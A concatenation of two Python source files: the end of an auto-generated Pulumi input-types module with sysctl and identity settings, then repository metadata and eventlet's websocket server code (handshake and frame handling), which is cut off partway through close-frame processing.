"""
return pulumi.get(self, "net_core_optmem_max")
@net_core_optmem_max.setter
def net_core_optmem_max(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_optmem_max", value)
@property
@pulumi.getter(name="netCoreRmemDefault")
def net_core_rmem_default(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.rmem_default.
"""
return pulumi.get(self, "net_core_rmem_default")
@net_core_rmem_default.setter
def net_core_rmem_default(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_rmem_default", value)
@property
@pulumi.getter(name="netCoreRmemMax")
def net_core_rmem_max(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.rmem_max.
"""
return pulumi.get(self, "net_core_rmem_max")
@net_core_rmem_max.setter
def net_core_rmem_max(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_rmem_max", value)
@property
@pulumi.getter(name="netCoreSomaxconn")
def net_core_somaxconn(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.somaxconn.
"""
return pulumi.get(self, "net_core_somaxconn")
@net_core_somaxconn.setter
def net_core_somaxconn(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_somaxconn", value)
@property
@pulumi.getter(name="netCoreWmemDefault")
def net_core_wmem_default(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.wmem_default.
"""
return pulumi.get(self, "net_core_wmem_default")
@net_core_wmem_default.setter
def net_core_wmem_default(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_wmem_default", value)
@property
@pulumi.getter(name="netCoreWmemMax")
def net_core_wmem_max(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.wmem_max.
"""
return pulumi.get(self, "net_core_wmem_max")
@net_core_wmem_max.setter
def net_core_wmem_max(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_wmem_max", value)
@property
@pulumi.getter(name="netIpv4IpLocalPortRange")
def net_ipv4_ip_local_port_range(self) -> Optional[pulumi.Input[str]]:
"""
Sysctl setting net.ipv4.ip_local_port_range.
"""
return pulumi.get(self, "net_ipv4_ip_local_port_range")
@net_ipv4_ip_local_port_range.setter
def net_ipv4_ip_local_port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "net_ipv4_ip_local_port_range", value)
@property
@pulumi.getter(name="netIpv4NeighDefaultGcThresh1")
def net_ipv4_neigh_default_gc_thresh1(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.neigh.default.gc_thresh1.
"""
return pulumi.get(self, "net_ipv4_neigh_default_gc_thresh1")
@net_ipv4_neigh_default_gc_thresh1.setter
def net_ipv4_neigh_default_gc_thresh1(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_neigh_default_gc_thresh1", value)
@property
@pulumi.getter(name="netIpv4NeighDefaultGcThresh2")
def net_ipv4_neigh_default_gc_thresh2(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.neigh.default.gc_thresh2.
"""
return pulumi.get(self, "net_ipv4_neigh_default_gc_thresh2")
@net_ipv4_neigh_default_gc_thresh2.setter
def net_ipv4_neigh_default_gc_thresh2(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_neigh_default_gc_thresh2", value)
@property
@pulumi.getter(name="netIpv4NeighDefaultGcThresh3")
def net_ipv4_neigh_default_gc_thresh3(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.neigh.default.gc_thresh3.
"""
return pulumi.get(self, "net_ipv4_neigh_default_gc_thresh3")
@net_ipv4_neigh_default_gc_thresh3.setter
def net_ipv4_neigh_default_gc_thresh3(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_neigh_default_gc_thresh3", value)
@property
@pulumi.getter(name="netIpv4TcpFinTimeout")
def net_ipv4_tcp_fin_timeout(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.tcp_fin_timeout.
"""
return pulumi.get(self, "net_ipv4_tcp_fin_timeout")
@net_ipv4_tcp_fin_timeout.setter
def net_ipv4_tcp_fin_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_tcp_fin_timeout", value)
@property
@pulumi.getter(name="netIpv4TcpKeepaliveProbes")
def net_ipv4_tcp_keepalive_probes(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.tcp_keepalive_probes.
"""
return pulumi.get(self, "net_ipv4_tcp_keepalive_probes")
@net_ipv4_tcp_keepalive_probes.setter
def net_ipv4_tcp_keepalive_probes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_tcp_keepalive_probes", value)
@property
@pulumi.getter(name="netIpv4TcpKeepaliveTime")
def net_ipv4_tcp_keepalive_time(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.tcp_keepalive_time.
"""
return pulumi.get(self, "net_ipv4_tcp_keepalive_time")
@net_ipv4_tcp_keepalive_time.setter
def net_ipv4_tcp_keepalive_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_tcp_keepalive_time", value)
@property
@pulumi.getter(name="netIpv4TcpMaxSynBacklog")
def net_ipv4_tcp_max_syn_backlog(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.tcp_max_syn_backlog.
"""
return pulumi.get(self, "net_ipv4_tcp_max_syn_backlog")
@net_ipv4_tcp_max_syn_backlog.setter
def net_ipv4_tcp_max_syn_backlog(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_tcp_max_syn_backlog", value)
@property
@pulumi.getter(name="netIpv4TcpMaxTwBuckets")
def net_ipv4_tcp_max_tw_buckets(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.tcp_max_tw_buckets.
"""
return pulumi.get(self, "net_ipv4_tcp_max_tw_buckets")
@net_ipv4_tcp_max_tw_buckets.setter
def net_ipv4_tcp_max_tw_buckets(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_tcp_max_tw_buckets", value)
    @property
    @pulumi.getter(name="netIpv4TcpTwReuse")
    def net_ipv4_tcp_tw_reuse(self) -> Optional[pulumi.Input[bool]]:
        """
        Sysctl setting net.ipv4.tcp_tw_reuse.
        """
        return pulumi.get(self, "net_ipv4_tcp_tw_reuse")

    @net_ipv4_tcp_tw_reuse.setter
    def net_ipv4_tcp_tw_reuse(self, value: Optional[pulumi.Input[bool]]):
        # Store the new value in the Pulumi-managed attribute table.
        pulumi.set(self, "net_ipv4_tcp_tw_reuse", value)
    @property
    @pulumi.getter(name="netIpv4TcpkeepaliveIntvl")
    def net_ipv4_tcpkeepalive_intvl(self) -> Optional[pulumi.Input[int]]:
        """
        Sysctl setting net.ipv4.tcp_keepalive_intvl.
        """
        return pulumi.get(self, "net_ipv4_tcpkeepalive_intvl")

    @net_ipv4_tcpkeepalive_intvl.setter
    def net_ipv4_tcpkeepalive_intvl(self, value: Optional[pulumi.Input[int]]):
        # Store the new value in the Pulumi-managed attribute table.
        pulumi.set(self, "net_ipv4_tcpkeepalive_intvl", value)
    @property
    @pulumi.getter(name="netNetfilterNfConntrackBuckets")
    def net_netfilter_nf_conntrack_buckets(self) -> Optional[pulumi.Input[int]]:
        """
        Sysctl setting net.netfilter.nf_conntrack_buckets.
        """
        return pulumi.get(self, "net_netfilter_nf_conntrack_buckets")

    @net_netfilter_nf_conntrack_buckets.setter
    def net_netfilter_nf_conntrack_buckets(self, value: Optional[pulumi.Input[int]]):
        # Store the new value in the Pulumi-managed attribute table.
        pulumi.set(self, "net_netfilter_nf_conntrack_buckets", value)
    @property
    @pulumi.getter(name="netNetfilterNfConntrackMax")
    def net_netfilter_nf_conntrack_max(self) -> Optional[pulumi.Input[int]]:
        """
        Sysctl setting net.netfilter.nf_conntrack_max.
        """
        return pulumi.get(self, "net_netfilter_nf_conntrack_max")

    @net_netfilter_nf_conntrack_max.setter
    def net_netfilter_nf_conntrack_max(self, value: Optional[pulumi.Input[int]]):
        # Store the new value in the Pulumi-managed attribute table.
        pulumi.set(self, "net_netfilter_nf_conntrack_max", value)
    @property
    @pulumi.getter(name="vmMaxMapCount")
    def vm_max_map_count(self) -> Optional[pulumi.Input[int]]:
        """
        Sysctl setting vm.max_map_count.
        """
        return pulumi.get(self, "vm_max_map_count")

    @vm_max_map_count.setter
    def vm_max_map_count(self, value: Optional[pulumi.Input[int]]):
        # Store the new value in the Pulumi-managed attribute table.
        pulumi.set(self, "vm_max_map_count", value)
    @property
    @pulumi.getter(name="vmSwappiness")
    def vm_swappiness(self) -> Optional[pulumi.Input[int]]:
        """
        Sysctl setting vm.swappiness.
        """
        return pulumi.get(self, "vm_swappiness")

    @vm_swappiness.setter
    def vm_swappiness(self, value: Optional[pulumi.Input[int]]):
        # Store the new value in the Pulumi-managed attribute table.
        pulumi.set(self, "vm_swappiness", value)
    @property
    @pulumi.getter(name="vmVfsCachePressure")
    def vm_vfs_cache_pressure(self) -> Optional[pulumi.Input[int]]:
        """
        Sysctl setting vm.vfs_cache_pressure.
        """
        return pulumi.get(self, "vm_vfs_cache_pressure")

    @vm_vfs_cache_pressure.setter
    def vm_vfs_cache_pressure(self, value: Optional[pulumi.Input[int]]):
        # Store the new value in the Pulumi-managed attribute table.
        pulumi.set(self, "vm_vfs_cache_pressure", value)
@pulumi.input_type
class TimeInWeekArgs:
    def __init__(__self__, *,
                 day: Optional[pulumi.Input[Union[str, 'WeekDay']]] = None,
                 hour_slots: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None):
        """
        Time in a week.
        :param pulumi.Input[Union[str, 'WeekDay']] day: A day in a week.
        :param pulumi.Input[Sequence[pulumi.Input[int]]] hour_slots: hour slots in a day.
        """
        # Record only the arguments that were actually supplied.
        for attr_name, supplied in (("day", day), ("hour_slots", hour_slots)):
            if supplied is not None:
                pulumi.set(__self__, attr_name, supplied)

    @property
    @pulumi.getter
    def day(self) -> Optional[pulumi.Input[Union[str, 'WeekDay']]]:
        """A day in a week."""
        return pulumi.get(self, "day")

    @day.setter
    def day(self, value: Optional[pulumi.Input[Union[str, 'WeekDay']]]):
        pulumi.set(self, "day", value)

    @property
    @pulumi.getter(name="hourSlots")
    def hour_slots(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
        """hour slots in a day."""
        return pulumi.get(self, "hour_slots")

    @hour_slots.setter
    def hour_slots(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
        pulumi.set(self, "hour_slots", value)
@pulumi.input_type
class TimeSpanArgs:
    def __init__(__self__, *,
                 end: Optional[pulumi.Input[str]] = None,
                 start: Optional[pulumi.Input[str]] = None):
        """
        The time span with start and end properties.
        :param pulumi.Input[str] end: The end of a time span
        :param pulumi.Input[str] start: The start of a time span
        """
        # Record only the arguments that were actually supplied.
        for attr_name, supplied in (("end", end), ("start", start)):
            if supplied is not None:
                pulumi.set(__self__, attr_name, supplied)

    @property
    @pulumi.getter
    def end(self) -> Optional[pulumi.Input[str]]:
        """The end of a time span"""
        return pulumi.get(self, "end")

    @end.setter
    def end(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "end", value)

    @property
    @pulumi.getter
    def start(self) -> Optional[pulumi.Input[str]]:
        """The start of a time span"""
        return pulumi.get(self, "start")

    @start.setter
    def start(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "start", value)
@pulumi.input_type
class UserAssignedIdentityArgs:
    def __init__(__self__, *,
                 client_id: Optional[pulumi.Input[str]] = None,
                 object_id: Optional[pulumi.Input[str]] = None,
                 resource_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] client_id: The client id of the user assigned identity.
        :param pulumi.Input[str] object_id: The object id of the user assigned identity.
        :param pulumi.Input[str] resource_id: The resource id of the user assigned identity.
        """
        # Record only the arguments that were actually supplied.
        for attr_name, supplied in (("client_id", client_id),
                                    ("object_id", object_id),
                                    ("resource_id", resource_id)):
            if supplied is not None:
                pulumi.set(__self__, attr_name, supplied)

    @property
    @pulumi.getter(name="clientId")
    def client_id(self) -> Optional[pulumi.Input[str]]:
        """The client id of the user assigned identity."""
        return pulumi.get(self, "client_id")

    @client_id.setter
    def client_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_id", value)

    @property
    @pulumi.getter(name="objectId")
    def object_id(self) -> Optional[pulumi.Input[str]]:
        """The object id of the user assigned identity."""
        return pulumi.get(self, "object_id")

    @object_id.setter
    def object_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "object_id", value)

    @property
    @pulumi.getter(name="resourceId")
    def resource_id(self) -> Optional[pulumi.Input[str]]:
        """The resource id of the user assigned identity."""
        return pulumi.get(self, "resource_id")

    @resource_id.setter
    def resource_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_id", value)
| 43.18613
| 551
| 0.672328
|
4a07c8d8e1e39931d599b59717771dd57278d90a
| 25,108
|
py
|
Python
|
ryu/contrib/_eventlet/websocket.py
|
umkcdcrg01/ryu_openflow
|
37ed5b88f7d119344e07c95314a7450235c037a8
|
[
"Apache-2.0"
] | 269
|
2015-03-08T11:32:45.000Z
|
2022-03-30T11:18:16.000Z
|
ryu/contrib/_eventlet/websocket.py
|
umkcdcrg01/ryu_openflow
|
37ed5b88f7d119344e07c95314a7450235c037a8
|
[
"Apache-2.0"
] | 2
|
2018-12-23T13:52:26.000Z
|
2021-10-31T13:01:43.000Z
|
ryu/contrib/_eventlet/websocket.py
|
umkcdcrg01/ryu_openflow
|
37ed5b88f7d119344e07c95314a7450235c037a8
|
[
"Apache-2.0"
] | 205
|
2015-01-13T04:52:25.000Z
|
2022-03-30T13:37:33.000Z
|
import base64
import codecs
import collections
import errno
from random import Random
import string
import struct
import sys
import time
from socket import error as SocketError
try:
from hashlib import md5, sha1
except ImportError: #pragma NO COVER
from md5 import md5
from sha import sha as sha1
import eventlet
from eventlet import semaphore
from eventlet import wsgi
from eventlet.green import socket
from eventlet.support import get_errno
# Python 2's utf8 decoding is more lenient than we'd like
# In order to pass autobahn's testsuite we need stricter validation
# if available...
for _mod in ('wsaccel.utf8validator', 'autobahn.utf8validator'):
    # autobahn has its own python-based validator. in newest versions
    # this prefers to use wsaccel, a cython based implementation, if available.
    # wsaccel may also be installed w/out autobahn, or with a earlier version.
    try:
        # fromlist=[''] makes __import__ return the submodule itself
        # rather than the top-level package.
        utf8validator = __import__(_mod, {}, {}, [''])
    except ImportError:
        # Fall through to the next candidate; stays None if none import.
        utf8validator = None
    else:
        # First importable candidate wins.
        break
# Socket errors that just mean the browser went away mid-conversation;
# the WSGI wrapper swallows these instead of propagating them.
ACCEPTABLE_CLIENT_ERRORS = set((errno.ECONNRESET, errno.EPIPE))

__all__ = ["WebSocketWSGI", "WebSocket"]
# Fixed GUID appended to Sec-WebSocket-Key when computing the RFC 6455
# handshake accept value.
PROTOCOL_GUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
# Close status codes a peer may legitimately send (RFC 6455 section 7.4.1).
# Wrapped in list(...) because bare range(...) + range(...) only works on
# Python 2 (where range returns a list); list(range(...)) behaves identically
# there and also works on Python 3.
VALID_CLOSE_STATUS = (list(range(1000, 1004))
                      + list(range(1007, 1012))
                      # 3000-3999: reserved for use by libraries, frameworks,
                      # and applications
                      + list(range(3000, 4000))
                      # 4000-4999: reserved for private use and thus can't
                      # be registered
                      + list(range(4000, 5000)))
class BadRequest(Exception):
    """Raised internally to abort a websocket handshake.

    Carries the HTTP status line, an optional response body and optional
    extra headers so that :meth:`WebSocketWSGI.__call__` can turn it into
    a plain WSGI error response.
    """

    def __init__(self, status='400 Bad Request', body=None, headers=None):
        # Fix: the original called super(Exception, self).__init__(), which
        # targets Exception's *parent* in the MRO and skips
        # Exception.__init__ entirely.  Pass the status so str(e) is useful.
        super(BadRequest, self).__init__(status)
        self.status = status
        self.body = body
        self.headers = headers
class WebSocketWSGI(object):
    """Wraps a websocket handler function in a WSGI application.

    Use it like this::

      @websocket.WebSocketWSGI
      def my_handler(ws):
          from_browser = ws.wait()
          ws.send("from server")

    The single argument to the function will be an instance of
    :class:`WebSocket`. To close the socket, simply return from the
    function. Note that the server will log the websocket request at
    the time of closure.
    """

    def __init__(self, handler):
        # User-supplied callable that receives the WebSocket instance.
        self.handler = handler
        # Set per-request by the _handle_*_request methods (75/76/8/13).
        self.protocol_version = None
        self.support_legacy_versions = True
        self.supported_protocols = []
        self.origin_checker = None

    @classmethod
    def configured(cls,
                   handler=None,
                   supported_protocols=None,
                   origin_checker=None,
                   support_legacy_versions=False):
        # Alternate constructor usable either as a decorator factory
        # (handler=None) or called directly with the handler.
        def decorator(handler):
            inst = cls(handler)
            inst.support_legacy_versions = support_legacy_versions
            inst.origin_checker = origin_checker
            if supported_protocols:
                inst.supported_protocols = supported_protocols
            return inst
        if handler is None:
            return decorator
        return decorator(handler)

    def __call__(self, environ, start_response):
        """WSGI entry point: perform the websocket handshake and run the handler."""
        # The Connection header is a comma-separated token list; it must
        # contain 'upgrade' and be paired with Upgrade: websocket.
        http_connection_parts = [
            part.strip()
            for part in environ.get('HTTP_CONNECTION', '').lower().split(',')]
        if not ('upgrade' in http_connection_parts and
                environ.get('HTTP_UPGRADE', '').lower() == 'websocket'):
            # need to check a few more things here for true compliance
            start_response('400 Bad Request', [('Connection', 'close')])
            return []
        try:
            # Sec-WebSocket-Version distinguishes hybi (8/13) from the
            # legacy hixie-75/76 handshakes.
            if 'HTTP_SEC_WEBSOCKET_VERSION' in environ:
                ws = self._handle_hybi_request(environ)
            elif self.support_legacy_versions:
                ws = self._handle_legacy_request(environ)
            else:
                raise BadRequest()
        except BadRequest as e:
            # Translate a failed handshake into a plain WSGI error response.
            status = e.status
            body = e.body or ''
            headers = e.headers or []
            start_response(status,
                           [('Connection', 'close'), ] + headers)
            return [body]
        try:
            self.handler(ws)
        except socket.error as e:
            # Broken pipe / connection reset just mean the client left.
            if get_errno(e) not in ACCEPTABLE_CLIENT_ERRORS:
                raise
        # Make sure we send the closing frame
        ws._send_closing_frame(True)
        # use this undocumented feature of eventlet.wsgi to ensure that it
        # doesn't barf on the fact that we didn't call start_response
        return wsgi.ALREADY_HANDLED

    def _handle_legacy_request(self, environ):
        """Perform the hixie-75/76 handshake and return a :class:`WebSocket`."""
        sock = environ['eventlet.input'].get_socket()

        # Presence of Sec-WebSocket-Key1 (and Key2) marks hixie-76;
        # otherwise fall back to hixie-75.
        if 'HTTP_SEC_WEBSOCKET_KEY1' in environ:
            self.protocol_version = 76
            if 'HTTP_SEC_WEBSOCKET_KEY2' not in environ:
                raise BadRequest()
        else:
            self.protocol_version = 75

        if self.protocol_version == 76:
            key1 = self._extract_number(environ['HTTP_SEC_WEBSOCKET_KEY1'])
            key2 = self._extract_number(environ['HTTP_SEC_WEBSOCKET_KEY2'])
            # There's no content-length header in the request, but it has 8
            # bytes of data.
            environ['wsgi.input'].content_length = 8
            key3 = environ['wsgi.input'].read(8)
            # hixie-76 challenge response: md5 over the two decoded keys
            # (big-endian u32 each) plus the 8 raw body bytes.
            key = struct.pack(">II", key1, key2) + key3
            response = md5(key).digest()

        # Start building the response
        scheme = 'ws'
        if environ.get('wsgi.url_scheme') == 'https':
            scheme = 'wss'
        location = '%s://%s%s%s' % (
            scheme,
            environ.get('HTTP_HOST'),
            environ.get('SCRIPT_NAME'),
            environ.get('PATH_INFO')
        )
        qs = environ.get('QUERY_STRING')
        if qs is not None:
            location += '?' + qs
        if self.protocol_version == 75:
            handshake_reply = ("HTTP/1.1 101 Web Socket Protocol Handshake\r\n"
                               "Upgrade: WebSocket\r\n"
                               "Connection: Upgrade\r\n"
                               "WebSocket-Origin: %s\r\n"
                               "WebSocket-Location: %s\r\n\r\n" % (
                                   environ.get('HTTP_ORIGIN'),
                                   location))
        elif self.protocol_version == 76:
            handshake_reply = ("HTTP/1.1 101 WebSocket Protocol Handshake\r\n"
                               "Upgrade: WebSocket\r\n"
                               "Connection: Upgrade\r\n"
                               "Sec-WebSocket-Origin: %s\r\n"
                               "Sec-WebSocket-Protocol: %s\r\n"
                               "Sec-WebSocket-Location: %s\r\n"
                               "\r\n%s" % (
                                   environ.get('HTTP_ORIGIN'),
                                   environ.get('HTTP_SEC_WEBSOCKET_PROTOCOL', 'default'),
                                   location,
                                   response))
        else:  #pragma NO COVER
            raise ValueError("Unknown WebSocket protocol version.")
        sock.sendall(handshake_reply)
        return WebSocket(sock, environ, self.protocol_version)

    def _handle_hybi_request(self, environ):
        """Perform the RFC 6455 (hybi-8/13) handshake; return an :class:`RFC6455WebSocket`."""
        sock = environ['eventlet.input'].get_socket()
        hybi_version = environ['HTTP_SEC_WEBSOCKET_VERSION']
        if hybi_version not in ('8', '13', ):
            # Advertise the versions we do speak, per RFC 6455 4.4.
            raise BadRequest(status='426 Upgrade Required',
                             headers=[('Sec-WebSocket-Version', '8, 13')])
        self.protocol_version = int(hybi_version)
        if 'HTTP_SEC_WEBSOCKET_KEY' not in environ:
            # That's bad.
            raise BadRequest()

        # Version 8 clients send the origin in Sec-WebSocket-Origin instead.
        origin = environ.get(
            'HTTP_ORIGIN',
            (environ.get('HTTP_SEC_WEBSOCKET_ORIGIN', '')
             if self.protocol_version <= 8 else ''))
        if self.origin_checker is not None:
            if not self.origin_checker(environ.get('HTTP_HOST'), origin):
                raise BadRequest(status='403 Forbidden')

        # Negotiate the first client-offered subprotocol we support.
        protocols = environ.get('HTTP_SEC_WEBSOCKET_PROTOCOL', None)
        negotiated_protocol = None
        if protocols:
            for p in (i.strip() for i in protocols.split(',')):
                if p in self.supported_protocols:
                    negotiated_protocol = p
                    break

        #extensions = environ.get('HTTP_SEC_WEBSOCKET_EXTENSIONS', None)
        #if extensions:
        #    extensions = [i.strip() for i in extensions.split(',')]

        # Accept value per RFC 6455 4.2.2: base64(sha1(key + GUID)).
        key = environ['HTTP_SEC_WEBSOCKET_KEY']
        response = base64.b64encode(sha1(key + PROTOCOL_GUID).digest())
        handshake_reply = ["HTTP/1.1 101 Switching Protocols",
                           "Upgrade: websocket",
                           "Connection: Upgrade",
                           "Sec-WebSocket-Accept: %s" % (response, )]
        if negotiated_protocol:
            handshake_reply.append("Sec-WebSocket-Protocol: %s"
                                   % (negotiated_protocol, ))
        sock.sendall('\r\n'.join(handshake_reply) + '\r\n\r\n')
        return RFC6455WebSocket(sock, environ, self.protocol_version,
                                protocol=negotiated_protocol)

    def _extract_number(self, value):
        """
        Utility function which, given a string like 'g98sd 5[]221@1', will
        return 9852211. Used to parse the Sec-WebSocket-Key headers.
        """
        out = ""
        spaces = 0
        for char in value:
            if char in string.digits:
                out += char
            elif char == " ":
                spaces += 1
        # NOTE(review): raises ZeroDivisionError if the header contains no
        # spaces; hixie-76 clients always send at least one, but a malformed
        # request would crash here -- confirm that is acceptable.  Integer
        # division is intended (Python 2 semantics).
        return int(out) / spaces
class WebSocket(object):
    """A websocket object that handles the details of
    serialization/deserialization to the socket.

    The primary way to interact with a :class:`WebSocket` object is to
    call :meth:`send` and :meth:`wait` in order to pass messages back
    and forth with the browser. Also available are the following
    properties:

    path
        The path value of the request. This is the same as the WSGI PATH_INFO variable, but more convenient.
    protocol
        The value of the Websocket-Protocol header.
    origin
        The value of the 'Origin' header.
    environ
        The full WSGI environment for this request.
    """

    def __init__(self, sock, environ, version=76):
        """
        :param socket: The eventlet socket
        :type socket: :class:`eventlet.greenio.GreenSocket`
        :param environ: The wsgi environment
        :param version: The WebSocket spec version to follow (default is 76)
        """
        self.socket = sock
        self.origin = environ.get('HTTP_ORIGIN')
        self.protocol = environ.get('HTTP_WEBSOCKET_PROTOCOL')
        self.path = environ.get('PATH_INFO')
        self.environ = environ
        self.version = version
        self.websocket_closed = False
        # Raw receive buffer (Python 2 byte string) holding partial frames.
        self._buf = ""
        # FIFO of fully parsed, not-yet-delivered messages.
        self._msgs = collections.deque()
        # Serializes senders so concurrent greenthreads can't interleave frames.
        self._sendlock = semaphore.Semaphore()

    @staticmethod
    def _pack_message(message):
        """Pack the message inside ``00`` and ``FF``

        As per the dataframing section (5.3) for the websocket spec
        """
        # Python 2 only: unicode is encoded, anything else coerced to str.
        if isinstance(message, unicode):
            message = message.encode('utf-8')
        elif not isinstance(message, str):
            message = str(message)
        packed = "\x00%s\xFF" % message
        return packed

    def _parse_messages(self):
        """ Parses for messages in the buffer *buf*.  It is assumed that
        the buffer contains the start character for a message, but that it
        may contain only part of the rest of the message.

        Returns an array of messages, and the buffer remainder that
        didn't contain any full messages."""
        msgs = []
        end_idx = 0
        buf = self._buf
        while buf:
            # hixie framing: 0x00 <utf-8 payload> 0xFF; 0xFF 0x00 closes.
            frame_type = ord(buf[0])
            if frame_type == 0:
                # Normal message.
                end_idx = buf.find("\xFF")
                if end_idx == -1: #pragma NO COVER
                    # Incomplete frame; wait for more data.
                    break
                msgs.append(buf[1:end_idx].decode('utf-8', 'replace'))
                buf = buf[end_idx+1:]
            elif frame_type == 255:
                # Closing handshake.
                assert ord(buf[1]) == 0, "Unexpected closing handshake: %r" % buf
                self.websocket_closed = True
                break
            else:
                raise ValueError("Don't understand how to parse this type of message: %r" % buf)
        self._buf = buf
        return msgs

    def send(self, message):
        """Send a message to the browser.

        *message* should be convertable to a string; unicode objects should be
        encodable as utf-8.  Raises socket.error with errno of 32
        (broken pipe) if the socket has already been closed by the client."""
        packed = self._pack_message(message)
        # if two greenthreads are trying to send at the same time
        # on the same socket, sendlock prevents interleaving and corruption
        self._sendlock.acquire()
        try:
            self.socket.sendall(packed)
        finally:
            self._sendlock.release()

    def wait(self):
        """Waits for and deserializes messages.

        Returns a single message; the oldest not yet processed. If the client
        has already closed the connection, returns None.  This is different
        from normal socket behavior because the empty string is a valid
        websocket message."""
        while not self._msgs:
            # Websocket might be closed already.
            if self.websocket_closed:
                return None
            # no parsed messages, must mean buf needs more data
            delta = self.socket.recv(8096)
            if delta == '':
                # Peer closed the TCP connection.
                return None
            self._buf += delta
            msgs = self._parse_messages()
            self._msgs.extend(msgs)
        return self._msgs.popleft()

    def _send_closing_frame(self, ignore_send_errors=False):
        """Sends the closing frame to the client, if required."""
        # Only hixie-76 defines a closing frame (0xFF 0x00).
        if self.version == 76 and not self.websocket_closed:
            try:
                self.socket.sendall("\xff\x00")
            except SocketError:
                # Sometimes, like when the remote side cuts off the connection,
                # we don't care about this.
                if not ignore_send_errors: #pragma NO COVER
                    raise
            self.websocket_closed = True

    def close(self):
        """Forcibly close the websocket; generally it is preferable to
        return from the handler method."""
        self._send_closing_frame()
        self.socket.shutdown(True)
        self.socket.close()
class ConnectionClosedError(Exception):
    """Raised when the remote endpoint has closed the websocket."""
class FailedConnectionError(Exception):
    """Signals a fatal websocket protocol violation.

    ``status`` is the close status code and ``message`` the human-readable
    reason; both are also carried in ``args``.
    """

    def __init__(self, status, message):
        super(FailedConnectionError, self).__init__(status, message)
        self.status = status
        self.message = message
class ProtocolError(ValueError):
    """Raised when an outgoing frame would violate the websocket protocol."""
class RFC6455WebSocket(WebSocket):
    """RFC 6455 (hybi-8/13) framing on top of the legacy :class:`WebSocket` API.

    Python 2 implementation: frames are handled as byte strings via
    ``ord``/``chr``; text payloads are decoded to ``unicode``.
    """

    def __init__(self, sock, environ, version=13, protocol=None, client=False):
        super(RFC6455WebSocket, self).__init__(sock, environ, version)
        # Generator that yields one complete (possibly reassembled) message
        # per iteration; wait() pulls from it.
        self.iterator = self._iter_frames()
        # client=True flips the masking rules (clients mask, servers don't).
        self.client = client
        self.protocol = protocol

    class UTF8Decoder(object):
        """Incremental UTF-8 decoder, strict when a C validator is available."""

        def __init__(self):
            if utf8validator:
                self.validator = utf8validator.Utf8Validator()
            else:
                self.validator = None
            decoderclass = codecs.getincrementaldecoder('utf8')
            self.decoder = decoderclass()

        def reset(self):
            if self.validator:
                self.validator.reset()
            self.decoder.reset()

        def decode(self, data, final=False):
            if self.validator:
                # Stricter than Python 2's built-in decoder; needed to pass
                # the autobahn test suite.
                valid, eocp, c_i, t_i = self.validator.validate(data)
                if not valid:
                    raise ValueError('Data is not valid unicode')
            return self.decoder.decode(data, final)

    def _get_bytes(self, numbytes):
        """Read exactly *numbytes* from the socket or raise ConnectionClosedError."""
        data = ''
        while len(data) < numbytes:
            d = self.socket.recv(numbytes - len(data))
            if not d:
                raise ConnectionClosedError()
            data = data + d
        return data

    class Message(object):
        """Accumulates the fragments of one (possibly fragmented) message."""

        def __init__(self, opcode, decoder=None):
            # decoder is set for text frames (opcode 1) only.
            self.decoder = decoder
            self.data = []
            self.finished = False
            self.opcode = opcode

        def push(self, data, final=False):
            if self.decoder:
                data = self.decoder.decode(data, final=final)
            self.finished = final
            self.data.append(data)

        def getvalue(self):
            return ''.join(self.data)

    @staticmethod
    def _apply_mask(data, mask, length=None, offset=0):
        """XOR *data* with the 4-byte *mask* (RFC 6455 5.3); masking and
        unmasking are the same operation.  *offset* continues a mask across
        chunked reads."""
        if length is None:
            length = len(data)
        cnt = range(length)
        return ''.join(chr(ord(data[i]) ^ mask[(offset + i) % 4]) for i in cnt)

    def _handle_control_frame(self, opcode, data):
        """Process a close (8), ping (9) or pong (0xA) frame."""
        if opcode == 8:  # connection close
            if not data:
                # Empty payload defaults to normal closure.
                status = 1000
            elif len(data) > 1:
                # First two bytes are the close status code (network order);
                # the rest must be valid UTF-8 reason text.
                status = struct.unpack_from('!H', data)[0]
                if not status or status not in VALID_CLOSE_STATUS:
                    raise FailedConnectionError(
                        1002,
                        "Unexpected close status code.")
                try:
                    data = self.UTF8Decoder().decode(data[2:], True)
                except (UnicodeDecodeError, ValueError):
                    raise FailedConnectionError(
                        1002,
                        "Close message data should be valid UTF-8.")
